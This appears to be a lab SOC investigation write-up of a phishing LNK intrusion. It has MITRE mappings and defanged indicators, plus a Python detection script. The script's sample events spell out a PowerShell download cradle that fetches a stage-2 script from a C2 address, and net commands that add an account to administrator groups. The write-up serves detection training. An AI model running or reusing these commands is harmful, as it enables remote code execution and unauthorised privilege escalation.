// soc investigation 2026-04-28
SOC339 ZDI-CAN-25373 Windows Shortcut Exploit Detected
letsdefend High closed ✓ true positive
mitre/T1566-001 mitre/T1204-002 mitre/T1059-001 mitre/T1105 mitre/T1546-013 mitre/T1098 mitre/T1021-001 mitre/T1071-001
analyst verdict TRUE POSITIVE

🎯 MITRE ATT&CK

T1566.001 - Initial Access: Phishing: Spearphishing Attachment
T1204.002 - Execution: User Execution: Malicious File
T1059.001 - Execution: Command and Scripting Interpreter: PowerShell
T1105 - Command and Control: Ingress Tool Transfer
T1546.013 - Persistence: Event Triggered Execution: PowerShell Profile
T1098 - Persistence: Account Manipulation
T1021.001 - Lateral Movement: Remote Services: Remote Desktop Protocol
T1071.001 - Command and Control: Application Layer Protocol: Web Protocols


🔎 What

Alert SOC339 - ZDI-CAN-25373 fired on host Cooper after execution of 2025AnnualReport[.]lnk (SHA256: 6F927D74FB2075C60F2F7795B718CA571947F3D1E7B591D2D2FD5A35DD5503F8). The user was phished via an email from michael[.]johnson[@]pm[.]me (SMTP IP 3[.]5[.]132[.]248) and downloaded a ZIP attachment that dropped the LNK into C:\Users\LetsDefend\Downloads. The LNK launched PowerShell with ExecutionPolicy Bypass to retrieve stage 2 from hxxp[://]18[.]223[.]186[.]129:4444/MBS[.]ps1. The Helpdesk account was added to the Administrators and Remote Desktop Users groups. A reverse shell was established from 172[.]31[.]23[.]112:49922 to the C2 at 18[.]223[.]186[.]129:4444. Registry writes were confirmed to HKLM\SOFTWARE\MICROSOFT\TRACING\POWERSHELL_RASAPI32. Persistence was set up via the PowerShell StartupProfileData-NonInteractive file. Verdict: True Positive - Active Compromise. Response - email removed, LNK and ZIP deleted, persistence file removed, Helpdesk account removed from both groups, machine contained.
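The chain above (LNK launched from Downloads, PowerShell with ExecutionPolicy Bypass pulling stage 2 over HTTP, then the Helpdesk account added to privileged groups) can be triaged from process-creation telemetry. The following is an added example written for this writeup, not LetsDefend's or the original analyst's code: it runs three rules over constructed sample events in an assumed simplified log format; the exact PowerShell command line and the use of net.exe for the group change are assumptions, since the writeup records only the policy bypass, the stage-2 URL and the resulting group membership.

```python
import re

# Constructed sample process-creation events in an assumed simplified
# "<timestamp> <host> <image> <command line>" format, not real telemetry. The
# PowerShell command line and the use of net.exe are assumed reconstructions.
SAMPLE_EVENTS = [
    r'2025-03-20T13:48:02 Cooper C:\Windows\explorer.exe explorer.exe "C:\Users\LetsDefend\Downloads\2025AnnualReport.lnk"',
    r"2025-03-20T13:48:03 Cooper C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://18.223.186.129:4444/MBS.ps1'))",
    r"2025-03-20T13:49:10 Cooper C:\Windows\System32\net.exe net localgroup Administrators Helpdesk /add",
    r'2025-03-20T13:49:11 Cooper C:\Windows\System32\net.exe net localgroup "Remote Desktop Users" Helpdesk /add',
    r"2025-03-20T13:50:00 Cooper C:\Windows\System32\svchost.exe svchost.exe -k netsvcs",
]

# Each rule: (name, ATT&CK technique, predicate over (image, command line)).
RULES = [
    ("lnk_from_downloads", "T1204.002",
     lambda img, cmd: re.search(r'\\Downloads\\[^"\']+\.lnk', cmd, re.I) is not None),
    ("powershell_bypass_download", "T1059.001",
     lambda img, cmd: img.lower().endswith("powershell.exe")
     and re.search(r"-e\w*\s+bypass", cmd, re.I) is not None   # any -ExecutionPolicy prefix
     and re.search(r"https?://", cmd, re.I) is not None),       # remote stage-2 fetch
    ("privileged_group_add", "T1098",
     lambda img, cmd: img.lower().endswith("net.exe")
     and re.search(r'localgroup\s+"?(administrators|remote desktop users)"?\s+\S+\s+/add',
                   cmd, re.I) is not None),
]

def triage(events):
    """Return one finding per (event, rule) match, tagged with its technique.
    Image paths are assumed to contain no spaces (the split is on the 3rd space)."""
    findings = []
    for line in events:
        ts, host, image, cmdline = line.split(" ", 3)
        for name, technique, matches in RULES:
            if matches(image, cmdline):
                findings.append({"time": ts, "host": host, "rule": name,
                                 "technique": technique, "cmd": cmdline})
    return findings

def verdict(findings):
    """Escalate only when the download cradle and the group change are both seen."""
    hit = {f["rule"] for f in findings}
    chain = {"powershell_bypass_download", "privileged_group_add"}
    return "TRUE POSITIVE" if chain <= hit else "needs review"

if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    print(len(found), "findings; verdict:", verdict(found))
```

The lone svchost event produces no finding, and a single LNK launch without the download cradle and group change stays at "needs review" rather than auto-escalating.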

🕐 When

Mar 20, 2025 - 01:48 PM

📍 Where

Host Cooper at 172[.]16[.]17[.]217. LNK dropped to C:\Users\LetsDefend\Downloads. Reverse shell from 172[.]31[.]23[.]112:49922 to 18[.]223[.]186[.]129:4444. Stage 2 from hxxp[://]18[.]223[.]186[.]129:4444/MBS[.]ps1.

👤 Who

Threat actor via phishing email from michael[.]johnson[@]pm[.]me through SMTP IP 3[.]5[.]132[.]248. Delivery via ZIP attachment containing malicious LNK. Actor established persistence, escalated privileges via Helpdesk account, enabled RDP, and maintained reverse shell C2 - consistent with hands-on-keyboard intrusion.

💡 Why

The user executed the LNK believing it to be a legitimate annual report. The shortcut abused Windows LNK execution to launch PowerShell with the script policy bypassed and retrieve a remote payload, a technique associated with ZDI-CAN-25373. The goal appears to be persistent privileged access and lateral movement via RDP.

🔬 Analysis Reports

🦠 VirusTotal https://www.virustotal.com/gui/file/6f927d74fb2075c60f2f7795b718ca571947f3d1e7b591d2d2fd5a35dd5503f8/details

Hybrid Analysis https://hybrid-analysis.com/sample/6f927d74fb2075c60f2f7795b718ca571947f3d1e7b591d2d2fd5a35dd5503f8

Hybrid Analysis (report) https://hybrid-analysis.com/sample/6f927d74fb2075c60f2f7795b718ca571947f3d1e7b591d2d2fd5a35dd5503f8/68596ed6b7a761c27f0a11c2